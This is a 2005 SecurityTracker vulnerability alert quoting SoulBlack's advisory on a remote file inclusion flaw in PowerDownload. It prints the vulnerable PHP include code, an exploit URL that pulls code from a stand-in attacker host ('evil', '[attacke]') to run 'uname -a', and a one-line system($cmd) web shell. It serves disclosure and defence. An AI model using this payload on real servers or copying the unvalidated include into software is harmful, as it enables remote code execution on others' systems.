PowerDownload Include File Bug Lets Remote Users Execute Arbitrary Commands
|
|
SecurityTracker Alert ID: 1014078
|
|
SecurityTracker URL: http://securitytracker.com/id?1014078
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: May 31 2005
|
Impact: Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Version(s): 3.0.2, 3.0.3
|
Description: SoulBlack Security Research reported a vulnerability in PowerDownload. A remote user can execute arbitrary commands on the target system.
The 'pdl-inc/pdl_header.inc.php' does not properly validate the 'incdir' variable. A remote user can supply a specially crafted
URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating
system commands, will run with the privileges of the target web service.
A demonstration exploit URL is provided:
http://[target]/download/downloads.php?release_id=
650&incdir=http://[attacke]/cmd.gif?&cmd=uname%20-a
The original advisory is available at:
http://www.soulblack.com.ar/repo/papers/advisory/powerdownload_advisory.t
xt
|
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.powerscripts.org/?page=projects&projectid=6 (Links to External Site)
|
Cause: Input validation error, State error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: SoulBlack Group <soulblacktm@gmail.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 31 May 2005 00:05:34 -0300
From: SoulBlack Group <soulblacktm@gmail.com>
Subject: PowerDownload Remote File Inclusion
|
===========================================================
============================================================
Title: PowerDownload Remote File Inclusion.
Vulnerability discovery: SoulBlack - Security Research -
http://soulblack.com.ar
Date: 31/05/2005
Severity: High. Remote Users Can Execute Arbitrary Code.
Affected version: v3.0.2 & v3.0.3
vendor: http://www.powerscripts.org/
============================================================
============================================================
* Summary *
PowerDownload is a PHP and mySQL based Download Script.
-------------------------------------------------------------
* Problem Description *
The bug reside in $incdir var in pdl-inc/pdl_header.inc.php
Vulnerable Code
// Include required Files
if(!isset($incdir)) $incdir = "";
require($incdir."pdl-inc/pdl_config.inc.php");
require($incdir."pdl-inc/pdl_db_class_".strtolower($config_sql_type).".inc.php");
require($incdir."pdl-inc/pdl_functions.inc.php");
/*
http://server/download/downloads.php?release_id=650&incdir=http://evil/cmd.gif?&cmd=uname%20-
a
Linux webserver101 2.4.21-243-athlon #1 Thu Aug 12 15:24:15 UTC 2004 i686 athlon
*/
/*
-------
cmd.gif
-------
<?
system($cmd);
?>
*/
-------------------------------------------------------------
-------------------------------------------------------------
* Fix *
Contact the Vendor.
-------------------------------------------------------------
* References *
http://www.soulblack.com.ar/repo/papers/advisory/powerdownload_advisory.txt
-------------------------------------------------------------
* Credits *
Vulnerability reported by SoulBlack Security Research
============================================================
--
SoulBlack - Security Research
http://www.soulblack.com.ar
|
|
